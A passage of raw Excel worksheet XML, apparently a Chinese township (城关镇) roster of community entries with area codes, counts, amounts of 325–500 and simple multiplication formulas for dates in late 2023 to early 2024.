        <f>B1072</f>
        <v>城关镇</v>
      </c>
      <c r="C1073" s="17" t="str">
        <f>C1072</f>
        <v>饮食服务公司中华办理</v>
      </c>
      <c r="D1073" s="19" t="s">
        <v>2863</v>
      </c>
      <c r="E1073" s="19" t="s">
        <v>2277</v>
      </c>
      <c r="F1073" s="17" t="str">
        <f>F1072</f>
        <v>4113210108</v>
      </c>
      <c r="G1073" s="17"/>
      <c r="H1073" s="17"/>
      <c r="I1073" s="17"/>
      <c r="J1073" s="17"/>
      <c r="K1073" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1074" customHeight="1" spans="1:11">
      <c r="A1074" s="16" t="s">
        <v>2864</v>
      </c>
      <c r="B1074" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1074" s="17" t="s">
        <v>2865</v>
      </c>
      <c r="D1074" s="17" t="s">
        <v>2866</v>
      </c>
      <c r="E1074" s="17" t="s">
        <v>312</v>
      </c>
      <c r="F1074" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1074" s="17">
        <v>1</v>
      </c>
      <c r="H1074" s="18">
        <v>365</v>
      </c>
      <c r="I1074" s="17">
        <f>H1074*G1074</f>
        <v>365</v>
      </c>
      <c r="J1074" s="17">
        <v>45231</v>
      </c>
      <c r="K1074" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1075" customHeight="1" spans="1:11">
      <c r="A1075" s="16" t="s">
        <v>2867</v>
      </c>
      <c r="B1075" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1075" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1075" s="17" t="s">
        <v>2868</v>
      </c>
      <c r="E1075" s="17" t="s">
        <v>1091</v>
      </c>
      <c r="F1075" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1075" s="17">
        <v>1</v>
      </c>
      <c r="H1075" s="18">
        <v>365</v>
      </c>
      <c r="I1075" s="17">
        <f>H1075*G1075</f>
        <v>365</v>
      </c>
      <c r="J1075" s="17">
        <v>45231</v>
      </c>
      <c r="K1075" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1076" customHeight="1" spans="1:11">
      <c r="A1076" s="16" t="s">
        <v>2869</v>
      </c>
      <c r="B1076" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1076" s="17" t="s">
        <v>2870</v>
      </c>
      <c r="D1076" s="17" t="s">
        <v>2871</v>
      </c>
      <c r="E1076" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F1076" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1076" s="17">
        <v>2</v>
      </c>
      <c r="H1076" s="18">
        <v>325</v>
      </c>
      <c r="I1076" s="17">
        <f>H1076*G1076</f>
        <v>650</v>
      </c>
      <c r="J1076" s="17">
        <v>45231</v>
      </c>
      <c r="K1076" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1077" customHeight="1" spans="1:11">
      <c r="A1077" s="16" t="s">
        <v>2872</v>
      </c>
      <c r="B1077" s="17" t="str">
        <f>B1076</f>
        <v>城关镇</v>
      </c>
      <c r="C1077" s="17" t="str">
        <f>C1076</f>
        <v>剧团西北办理</v>
      </c>
      <c r="D1077" s="19" t="s">
        <v>2873</v>
      </c>
      <c r="E1077" s="19" t="s">
        <v>2874</v>
      </c>
      <c r="F1077" s="17" t="str">
        <f>F1076</f>
        <v>4113210108</v>
      </c>
      <c r="G1077" s="17"/>
      <c r="H1077" s="17"/>
      <c r="I1077" s="17"/>
      <c r="J1077" s="17"/>
      <c r="K1077" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1078" customHeight="1" spans="1:11">
      <c r="A1078" s="16" t="s">
        <v>2875</v>
      </c>
      <c r="B1078" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1078" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D1078" s="17" t="s">
        <v>2876</v>
      </c>
      <c r="E1078" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F1078" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1078" s="17">
        <v>1</v>
      </c>
      <c r="H1078" s="18">
        <v>365</v>
      </c>
      <c r="I1078" s="17">
        <f>H1078*G1078</f>
        <v>365</v>
      </c>
      <c r="J1078" s="17">
        <v>45231</v>
      </c>
      <c r="K1078" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1079" customHeight="1" spans="1:11">
      <c r="A1079" s="16" t="s">
        <v>2877</v>
      </c>
      <c r="B1079" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1079" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D1079" s="17" t="s">
        <v>2878</v>
      </c>
      <c r="E1079" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F1079" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1079" s="17">
        <v>2</v>
      </c>
      <c r="H1079" s="18">
        <v>325</v>
      </c>
      <c r="I1079" s="17">
        <f>H1079*G1079</f>
        <v>650</v>
      </c>
      <c r="J1079" s="17">
        <v>45231</v>
      </c>
      <c r="K1079" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1080" customHeight="1" spans="1:11">
      <c r="A1080" s="16" t="s">
        <v>2879</v>
      </c>
      <c r="B1080" s="17" t="str">
        <f>B1079</f>
        <v>城关镇</v>
      </c>
      <c r="C1080" s="17" t="str">
        <f>C1079</f>
        <v>西北社区</v>
      </c>
      <c r="D1080" s="19" t="s">
        <v>2880</v>
      </c>
      <c r="E1080" s="19" t="s">
        <v>2536</v>
      </c>
      <c r="F1080" s="17" t="str">
        <f>F1079</f>
        <v>4113210108</v>
      </c>
      <c r="G1080" s="17"/>
      <c r="H1080" s="17"/>
      <c r="I1080" s="17"/>
      <c r="J1080" s="17"/>
      <c r="K1080" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1081" customHeight="1" spans="1:11">
      <c r="A1081" s="16" t="s">
        <v>2881</v>
      </c>
      <c r="B1081" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1081" s="17" t="s">
        <v>2045</v>
      </c>
      <c r="D1081" s="17" t="s">
        <v>2882</v>
      </c>
      <c r="E1081" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F1081" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1081" s="17">
        <v>1</v>
      </c>
      <c r="H1081" s="18">
        <v>365</v>
      </c>
      <c r="I1081" s="17">
        <f>H1081*G1081</f>
        <v>365</v>
      </c>
      <c r="J1081" s="17">
        <v>45231</v>
      </c>
      <c r="K1081" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1082" customHeight="1" spans="1:11">
      <c r="A1082" s="16" t="s">
        <v>2883</v>
      </c>
      <c r="B1082" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1082" s="17" t="s">
        <v>2884</v>
      </c>
      <c r="D1082" s="17" t="s">
        <v>2885</v>
      </c>
      <c r="E1082" s="17" t="s">
        <v>2886</v>
      </c>
      <c r="F1082" s="17">
        <v>4113210107</v>
      </c>
      <c r="G1082" s="17">
        <v>1</v>
      </c>
      <c r="H1082" s="18">
        <v>365</v>
      </c>
      <c r="I1082" s="17">
        <f>H1082*G1082</f>
        <v>365</v>
      </c>
      <c r="J1082" s="17">
        <v>45261</v>
      </c>
      <c r="K1082" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1083" customHeight="1" spans="1:11">
      <c r="A1083" s="16" t="s">
        <v>2887</v>
      </c>
      <c r="B1083" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1083" s="17" t="s">
        <v>2888</v>
      </c>
      <c r="D1083" s="17" t="s">
        <v>2889</v>
      </c>
      <c r="E1083" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F1083" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G1083" s="17">
        <v>1</v>
      </c>
      <c r="H1083" s="18">
        <v>365</v>
      </c>
      <c r="I1083" s="17">
        <f>H1083*G1083</f>
        <v>365</v>
      </c>
      <c r="J1083" s="17">
        <v>45261</v>
      </c>
      <c r="K1083" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1084" customHeight="1" spans="1:11">
      <c r="A1084" s="16" t="s">
        <v>2890</v>
      </c>
      <c r="B1084" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1084" s="17" t="s">
        <v>2891</v>
      </c>
      <c r="D1084" s="17" t="s">
        <v>2892</v>
      </c>
      <c r="E1084" s="17" t="s">
        <v>2893</v>
      </c>
      <c r="F1084" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G1084" s="17">
        <v>2</v>
      </c>
      <c r="H1084" s="18">
        <v>325</v>
      </c>
      <c r="I1084" s="17">
        <f>H1084*G1084</f>
        <v>650</v>
      </c>
      <c r="J1084" s="17">
        <v>45292</v>
      </c>
      <c r="K1084" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1085" customHeight="1" spans="1:11">
      <c r="A1085" s="16" t="s">
        <v>2894</v>
      </c>
      <c r="B1085" s="17" t="str">
        <f>B1084</f>
        <v>城关镇</v>
      </c>
      <c r="C1085" s="17" t="str">
        <f>C1084</f>
        <v>法院（民主社区办理）</v>
      </c>
      <c r="D1085" s="26" t="s">
        <v>2895</v>
      </c>
      <c r="E1085" s="26" t="s">
        <v>2896</v>
      </c>
      <c r="F1085" s="17" t="str">
        <f>F1084</f>
        <v>4113210105</v>
      </c>
      <c r="G1085" s="17"/>
      <c r="H1085" s="17"/>
      <c r="I1085" s="17"/>
      <c r="J1085" s="17"/>
      <c r="K1085" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1086" customHeight="1" spans="1:11">
      <c r="A1086" s="16" t="s">
        <v>2897</v>
      </c>
      <c r="B1086" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1086" s="17" t="s">
        <v>2898</v>
      </c>
      <c r="D1086" s="17" t="s">
        <v>2899</v>
      </c>
      <c r="E1086" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F1086" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G1086" s="17">
        <v>1</v>
      </c>
      <c r="H1086" s="18">
        <v>365</v>
      </c>
      <c r="I1086" s="17">
        <f>H1086*G1086</f>
        <v>365</v>
      </c>
      <c r="J1086" s="17">
        <v>45292</v>
      </c>
      <c r="K1086" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1087" customHeight="1" spans="1:11">
      <c r="A1087" s="16" t="s">
        <v>2900</v>
      </c>
      <c r="B1087" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1087" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D1087" s="17" t="s">
        <v>2901</v>
      </c>
      <c r="E1087" s="17" t="s">
        <v>2902</v>
      </c>
      <c r="F1087" s="17">
        <v>4113210106</v>
      </c>
      <c r="G1087" s="17">
        <v>2</v>
      </c>
      <c r="H1087" s="18">
        <v>325</v>
      </c>
      <c r="I1087" s="17">
        <f>H1087*G1087</f>
        <v>650</v>
      </c>
      <c r="J1087" s="17">
        <v>45292</v>
      </c>
      <c r="K1087" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1088" customHeight="1" spans="1:11">
      <c r="A1088" s="16" t="s">
        <v>2903</v>
      </c>
      <c r="B1088" s="17" t="str">
        <f>B1087</f>
        <v>城关镇</v>
      </c>
      <c r="C1088" s="17" t="str">
        <f>C1087</f>
        <v>西北社区</v>
      </c>
      <c r="D1088" s="26" t="s">
        <v>2904</v>
      </c>
      <c r="E1088" s="26" t="s">
        <v>337</v>
      </c>
      <c r="F1088" s="17">
        <f>F1087</f>
        <v>4113210106</v>
      </c>
      <c r="G1088" s="17"/>
      <c r="H1088" s="17"/>
      <c r="I1088" s="17"/>
      <c r="J1088" s="17"/>
      <c r="K1088" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1089" customHeight="1" spans="1:11">
      <c r="A1089" s="16" t="s">
        <v>2905</v>
      </c>
      <c r="B1089" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1089" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D1089" s="17" t="s">
        <v>2906</v>
      </c>
      <c r="E1089" s="17" t="s">
        <v>2379</v>
      </c>
      <c r="F1089" s="17">
        <v>4113210103</v>
      </c>
      <c r="G1089" s="17">
        <v>1</v>
      </c>
      <c r="H1089" s="18">
        <v>365</v>
      </c>
      <c r="I1089" s="17">
        <f t="shared" ref="I1089:I1099" si="54">H1089*G1089</f>
        <v>365</v>
      </c>
      <c r="J1089" s="17">
        <v>45292</v>
      </c>
      <c r="K1089" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1090" customHeight="1" spans="1:11">
      <c r="A1090" s="16" t="s">
        <v>2907</v>
      </c>
      <c r="B1090" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1090" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D1090" s="17" t="s">
        <v>2908</v>
      </c>
      <c r="E1090" s="17" t="s">
        <v>2909</v>
      </c>
      <c r="F1090" s="17">
        <v>4113210103</v>
      </c>
      <c r="G1090" s="17">
        <v>1</v>
      </c>
      <c r="H1090" s="18">
        <v>365</v>
      </c>
      <c r="I1090" s="17">
        <f t="shared" si="54"/>
        <v>365</v>
      </c>
      <c r="J1090" s="17">
        <v>45292</v>
      </c>
      <c r="K1090" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1091" customHeight="1" spans="1:11">
      <c r="A1091" s="16" t="s">
        <v>2910</v>
      </c>
      <c r="B1091" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1091" s="17" t="s">
        <v>2911</v>
      </c>
      <c r="D1091" s="17" t="s">
        <v>2912</v>
      </c>
      <c r="E1091" s="17" t="s">
        <v>2913</v>
      </c>
      <c r="F1091" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1091" s="17">
        <v>1</v>
      </c>
      <c r="H1091" s="18">
        <v>365</v>
      </c>
      <c r="I1091" s="17">
        <f t="shared" si="54"/>
        <v>365</v>
      </c>
      <c r="J1091" s="17">
        <v>45292</v>
      </c>
      <c r="K1091" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1092" customHeight="1" spans="1:11">
      <c r="A1092" s="16" t="s">
        <v>2914</v>
      </c>
      <c r="B1092" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1092" s="17" t="s">
        <v>2915</v>
      </c>
      <c r="D1092" s="17" t="s">
        <v>2916</v>
      </c>
      <c r="E1092" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F1092" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1092" s="17">
        <v>1</v>
      </c>
      <c r="H1092" s="18">
        <v>365</v>
      </c>
      <c r="I1092" s="17">
        <f t="shared" si="54"/>
        <v>365</v>
      </c>
      <c r="J1092" s="17">
        <v>45292</v>
      </c>
      <c r="K1092" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1093" customHeight="1" spans="1:11">
      <c r="A1093" s="16" t="s">
        <v>2917</v>
      </c>
      <c r="B1093" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1093" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1093" s="17" t="s">
        <v>2918</v>
      </c>
      <c r="E1093" s="17" t="s">
        <v>683</v>
      </c>
      <c r="F1093" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1093" s="17">
        <v>1</v>
      </c>
      <c r="H1093" s="18">
        <v>365</v>
      </c>
      <c r="I1093" s="17">
        <f t="shared" si="54"/>
        <v>365</v>
      </c>
      <c r="J1093" s="17">
        <v>45292</v>
      </c>
      <c r="K1093" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1094" customHeight="1" spans="1:11">
      <c r="A1094" s="16" t="s">
        <v>2919</v>
      </c>
      <c r="B1094" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1094" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1094" s="17" t="s">
        <v>2920</v>
      </c>
      <c r="E1094" s="17" t="s">
        <v>1871</v>
      </c>
      <c r="F1094" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1094" s="17">
        <v>2</v>
      </c>
      <c r="H1094" s="18">
        <v>325</v>
      </c>
      <c r="I1094" s="17">
        <f t="shared" si="54"/>
        <v>650</v>
      </c>
      <c r="J1094" s="17">
        <v>45292</v>
      </c>
      <c r="K1094" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1095" customHeight="1" spans="1:11">
      <c r="A1095" s="16" t="s">
        <v>2921</v>
      </c>
      <c r="B1095" s="17" t="str">
        <f>B1094</f>
        <v>城关镇</v>
      </c>
      <c r="C1095" s="17" t="str">
        <f>C1094</f>
        <v>中华社区</v>
      </c>
      <c r="D1095" s="30" t="s">
        <v>2922</v>
      </c>
      <c r="E1095" s="30" t="s">
        <v>521</v>
      </c>
      <c r="F1095" s="17">
        <f>F1094</f>
        <v>4113210108</v>
      </c>
      <c r="G1095" s="17"/>
      <c r="H1095" s="17"/>
      <c r="I1095" s="17"/>
      <c r="J1095" s="17"/>
      <c r="K1095" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1096" customHeight="1" spans="1:11">
      <c r="A1096" s="16" t="s">
        <v>2923</v>
      </c>
      <c r="B1096" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1096" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1096" s="17" t="s">
        <v>2924</v>
      </c>
      <c r="E1096" s="17" t="s">
        <v>2925</v>
      </c>
      <c r="F1096" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1096" s="17">
        <v>1</v>
      </c>
      <c r="H1096" s="18">
        <v>365</v>
      </c>
      <c r="I1096" s="17">
        <f t="shared" ref="I1096:I1103" si="55">H1096*G1096</f>
        <v>365</v>
      </c>
      <c r="J1096" s="17">
        <v>45292</v>
      </c>
      <c r="K1096" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1097" customHeight="1" spans="1:11">
      <c r="A1097" s="16" t="s">
        <v>2926</v>
      </c>
      <c r="B1097" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1097" s="17" t="s">
        <v>2927</v>
      </c>
      <c r="D1097" s="17" t="s">
        <v>2928</v>
      </c>
      <c r="E1097" s="17" t="s">
        <v>2929</v>
      </c>
      <c r="F1097" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1097" s="17">
        <v>1</v>
      </c>
      <c r="H1097" s="18">
        <v>365</v>
      </c>
      <c r="I1097" s="17">
        <f t="shared" si="55"/>
        <v>365</v>
      </c>
      <c r="J1097" s="17">
        <v>45352</v>
      </c>
      <c r="K1097" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1098" customHeight="1" spans="1:11">
      <c r="A1098" s="16" t="s">
        <v>2930</v>
      </c>
      <c r="B1098" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1098" s="17" t="s">
        <v>2841</v>
      </c>
      <c r="D1098" s="17" t="s">
        <v>2931</v>
      </c>
      <c r="E1098" s="17" t="s">
        <v>2932</v>
      </c>
      <c r="F1098" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1098" s="17">
        <v>1</v>
      </c>
      <c r="H1098" s="18">
        <v>365</v>
      </c>
      <c r="I1098" s="17">
        <f t="shared" si="55"/>
        <v>365</v>
      </c>
      <c r="J1098" s="17">
        <v>45352</v>
      </c>
      <c r="K1098" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1099" customHeight="1" spans="1:11">
      <c r="A1099" s="16" t="s">
        <v>2933</v>
      </c>
      <c r="B1099" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1099" s="17" t="s">
        <v>2934</v>
      </c>
      <c r="D1099" s="17" t="s">
        <v>2935</v>
      </c>
      <c r="E1099" s="17" t="s">
        <v>581</v>
      </c>
      <c r="F1099" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1099" s="17">
        <v>1</v>
      </c>
      <c r="H1099" s="18">
        <v>365</v>
      </c>
      <c r="I1099" s="17">
        <f t="shared" si="55"/>
        <v>365</v>
      </c>
      <c r="J1099" s="17">
        <v>45352</v>
      </c>
      <c r="K1099" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1100" customHeight="1" spans="1:11">
      <c r="A1100" s="16" t="s">
        <v>2936</v>
      </c>
      <c r="B1100" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1100" s="17" t="s">
        <v>2937</v>
      </c>
      <c r="D1100" s="17" t="s">
        <v>2938</v>
      </c>
      <c r="E1100" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F1100" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1100" s="17">
        <v>1</v>
      </c>
      <c r="H1100" s="18">
        <v>365</v>
      </c>
      <c r="I1100" s="17">
        <f t="shared" si="55"/>
        <v>365</v>
      </c>
      <c r="J1100" s="17">
        <v>45352</v>
      </c>
      <c r="K1100" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1101" customHeight="1" spans="1:11">
      <c r="A1101" s="16" t="s">
        <v>2939</v>
      </c>
      <c r="B1101" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1101" s="17" t="s">
        <v>2940</v>
      </c>
      <c r="D1101" s="17" t="s">
        <v>2941</v>
      </c>
      <c r="E1101" s="17" t="s">
        <v>2913</v>
      </c>
      <c r="F1101" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1101" s="17">
        <v>1</v>
      </c>
      <c r="H1101" s="18">
        <v>365</v>
      </c>
      <c r="I1101" s="17">
        <f t="shared" si="55"/>
        <v>365</v>
      </c>
      <c r="J1101" s="17">
        <v>45352</v>
      </c>
      <c r="K1101" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1102" customHeight="1" spans="1:11">
      <c r="A1102" s="16" t="s">
        <v>2942</v>
      </c>
      <c r="B1102" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1102" s="17" t="s">
        <v>2943</v>
      </c>
      <c r="D1102" s="17" t="s">
        <v>2944</v>
      </c>
      <c r="E1102" s="17" t="s">
        <v>617</v>
      </c>
      <c r="F1102" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1102" s="17">
        <v>1</v>
      </c>
      <c r="H1102" s="18">
        <v>365</v>
      </c>
      <c r="I1102" s="17">
        <f t="shared" si="55"/>
        <v>365</v>
      </c>
      <c r="J1102" s="17">
        <v>45352</v>
      </c>
      <c r="K1102" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1103" customHeight="1" spans="1:11">
      <c r="A1103" s="16" t="s">
        <v>2945</v>
      </c>
      <c r="B1103" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1103" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1103" s="17" t="s">
        <v>2946</v>
      </c>
      <c r="E1103" s="17" t="s">
        <v>1488</v>
      </c>
      <c r="F1103" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1103" s="17">
        <v>1</v>
      </c>
      <c r="H1103" s="18">
        <v>365</v>
      </c>
      <c r="I1103" s="17">
        <f t="shared" si="55"/>
        <v>365</v>
      </c>
      <c r="J1103" s="17">
        <v>45352</v>
      </c>
      <c r="K1103" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1104" customHeight="1" spans="1:11">
      <c r="A1104" s="16" t="s">
        <v>2947</v>
      </c>
      <c r="B1104" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1104" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1104" s="17" t="s">
        <v>2948</v>
      </c>
      <c r="E1104" s="17" t="s">
        <v>2949</v>
      </c>
      <c r="F1104" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1104" s="17">
        <v>1</v>
      </c>
      <c r="H1104" s="17">
        <v>500</v>
      </c>
      <c r="I1104" s="17">
        <v>500</v>
      </c>
      <c r="J1104" s="17">
        <v>45261</v>
      </c>
      <c r="K1104" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1105" customHeight="1" spans="1:11">
      <c r="A1105" s="16" t="s">
        <v>2950</v>
      </c>
      <c r="B1105" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1105" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1105" s="17" t="s">
        <v>2951</v>
      </c>
      <c r="E1105" s="17" t="s">
        <v>2952</v>
      </c>
      <c r="F1105" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1105" s="17">
        <v>1</v>
      </c>
      <c r="H1105" s="17">
        <v>500</v>
      </c>
      <c r="I1105" s="17">
        <v>500</v>
      </c>
      <c r="J1105" s="17">
        <v>45261</v>
      </c>
      <c r="K1105" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1106" customHeight="1" spans="1:11">
      <c r="A1106" s="16" t="s">
        <v>2953</v>
      </c>
      <c r="B1106" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1106" s="17" t="s">
        <v>2045</v>
      </c>
      <c r="D1106" s="17" t="s">
        <v>2954</v>
      </c>
      <c r="E1106" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F1106" s="17">
        <v>4113210107</v>
      </c>
      <c r="G1106" s="17">
        <v>1</v>
      </c>
      <c r="H1106" s="18">
        <v>365</v>
      </c>
      <c r="I1106" s="17">
        <f t="shared" ref="I1106:I1149" si="56">H1106*G1106</f>
        <v>365</v>
      </c>
      <c r="J1106" s="17">
        <v>45261</v>
      </c>
      <c r="K1106" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1107" customHeight="1" spans="1:11">
      <c r="A1107" s="16" t="s">
        <v>2955</v>
      </c>
      <c r="B1107" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1107" s="17" t="s">
        <v>2009</v>
      </c>
      <c r="D1107" s="17" t="s">
        <v>2956</v>
      </c>
      <c r="E1107" s="17" t="s">
        <v>877</v>
      </c>
      <c r="F1107" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G1107" s="17">
        <v>1</v>
      </c>
      <c r="H1107" s="18">
        <v>365</v>
      </c>
      <c r="I1107" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1107" s="17">
        <v>45323</v>
      </c>
      <c r="K1107" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1108" customHeight="1" spans="1:11">
      <c r="A1108" s="16" t="s">
        <v>2957</v>
      </c>
      <c r="B1108" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1108" s="17" t="s">
        <v>2958</v>
      </c>
      <c r="D1108" s="17" t="s">
        <v>2959</v>
      </c>
      <c r="E1108" s="17" t="s">
        <v>2960</v>
      </c>
      <c r="F1108" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1108" s="17">
        <v>1</v>
      </c>
      <c r="H1108" s="18">
        <v>365</v>
      </c>
      <c r="I1108" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1108" s="17">
        <v>45323</v>
      </c>
      <c r="K1108" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1109" customHeight="1" spans="1:11">
      <c r="A1109" s="16" t="s">
        <v>2961</v>
      </c>
      <c r="B1109" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1109" s="17" t="s">
        <v>2962</v>
      </c>
      <c r="D1109" s="17" t="s">
        <v>2963</v>
      </c>
      <c r="E1109" s="17" t="s">
        <v>2964</v>
      </c>
      <c r="F1109" s="17" t="s">
        <v>1975</v>
      </c>
      <c r="G1109" s="17">
        <v>1</v>
      </c>
      <c r="H1109" s="18">
        <v>365</v>
      </c>
      <c r="I1109" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1109" s="17">
        <v>45323</v>
      </c>
      <c r="K1109" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1110" customHeight="1" spans="1:11">
      <c r="A1110" s="16" t="s">
        <v>2965</v>
      </c>
      <c r="B1110" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1110" s="17" t="s">
        <v>2966</v>
      </c>
      <c r="D1110" s="17" t="s">
        <v>2967</v>
      </c>
      <c r="E1110" s="17" t="s">
        <v>2968</v>
      </c>
      <c r="F1110" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1110" s="17">
        <v>1</v>
      </c>
      <c r="H1110" s="18">
        <v>365</v>
      </c>
      <c r="I1110" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1110" s="17">
        <v>45323</v>
      </c>
      <c r="K1110" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1111" customHeight="1" spans="1:11">
      <c r="A1111" s="16" t="s">
        <v>2969</v>
      </c>
      <c r="B1111" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1111" s="17" t="s">
        <v>2970</v>
      </c>
      <c r="D1111" s="17" t="s">
        <v>2158</v>
      </c>
      <c r="E1111" s="17" t="s">
        <v>2971</v>
      </c>
      <c r="F1111" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G1111" s="17">
        <v>1</v>
      </c>
      <c r="H1111" s="18">
        <v>365</v>
      </c>
      <c r="I1111" s="17">
        <f t="shared" si="56"/>
        <v>365</v>
      </c>
      <c r="J1111" s="17">
        <v>45383</v>
      </c>
      <c r="K1111" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1112" customHeight="1" spans="1:11">
      <c r="A1112" s="16" t="s">
        <v>2972</v>
      </c>
      <c r="B1112" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1112" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D1112" s="17" t="s">
        <v>2973</v>
      </c>
      <c r="E1112" s="17" t="s">
        <v>542</v>
      </c>
      <c r="F1112" s="17" t="s">
        <v>266</v>
      </c>
